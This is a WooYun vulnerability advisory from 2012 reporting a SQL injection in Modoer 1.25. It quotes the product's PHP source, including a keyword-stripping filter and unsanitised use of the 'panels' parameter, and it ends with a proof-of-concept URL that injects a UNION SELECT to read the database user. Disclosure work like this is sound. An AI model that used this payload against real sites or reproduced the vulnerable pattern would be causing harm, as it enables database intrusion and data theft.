当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09467

漏洞标题:Modoer1.25 SQL 注入

相关厂商:Modoer点评系统

漏洞作者: Zvall

提交时间:2012-07-11 10:18

修复时间:2012-08-25 10:19

公开时间:2012-08-25 10:19

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL 注入

详细说明:

$pattern_arr = $replace_arr = array();
if(!defined('IN_ADMIN')) {
$pattern_arr = array(
"/ union /i", "/\/\*\s?\*\/union\/\*\s?\*\//i",
"/ select /i", "/\/\*\s?\*\/select\/\*\s?\*\//i",
"/ update /i", "/\/\*\s?\*\/update\/\*\s?\*\//i",
"/ from /i","/\/\*\s?\*\/from\/\*\s?\*\//i",
"/ or /i","/\/\*\s?\*\/or\/\*\s?\*\//i",
"/ and /i","/\/\*\s?\*\/and\/\*\s?\*\//i",
"/ outfile /i",
"/\(\s?select\s+/i",
);
$replace_arr = array(
' union ', '/∗∗/union/∗∗/',
' select ', '/∗∗/select/∗∗/',
' update ', '/∗∗/update/∗∗/',
' from ', '/∗∗/from/∗∗/',
' outfile ',
' or ', '/∗∗/or/∗∗/',
' and ', '/∗∗/and/∗∗/',
'* from ',
'(select ',
);
$_POST = strip_sql($_POST);
$_GET = strip_sql($_GET);
$_COOKIE = strip_sql($_COOKIE);
unset($pattern_arr, $replace_arr);
}
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
if(!MAGIC_QUOTES_GPC) {
$_POST = add_slashes($_POST); //调用addslashes 转义
$_GET = add_slashes($_GET);
$_COOKIE = add_slashes($_COOKIE);
$_FILES && $_FILES = add_slashes($_FILES);
}
if(!empty($_POST)) extract($_POST, EXTR_SKIP); if(!empty($_GET)) extract($_GET, EXTR_SKIP);
$sort = $jssort=='shop' ? (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0) : (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0);
$num = isset($num) && intval(trim($num)) >= 1 ? intval(trim($num)) : 10;
$intercept = isset($intercept) && $intercept > 0 ? intval($intercept) : 0;
$openwindow = isset($openwindow) && $openwindow > 0 ? 1 : 0;
$pcdname = isset($pcdname) && $pcdname > 0 ? 1 : 0;
if(!$sort) {
exit("document.write(\"未选择显示类型。\");");
}
$cachename = 'js_'.md5($jssort.$panels.$sort.$num);
$cachefile = MUDDER_CACHEDIR.'cache_'.$cachename.'.php';
$where = '';
if((@!include($cachefile)) || $timestamp - $_createtime_js > $cachelife) {
$panels = $panels ? explode('_', $panels) : '';
if($panels && is_array($panels)) foreach($panels as $panel) {
$where .= ($where ? " OR " : " ")."classcode like '{$panel}__'";
}


注入有木有?

漏洞证明:

http://localhost/sa/js.php?jssort=shop&sort=1&num=2&panels=_sb_fack_a'+and/**/1=2/**/union select+1,user(),3,4,5%23

修复方案:

过滤

版权声明:转载请注明来源 Zvall@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝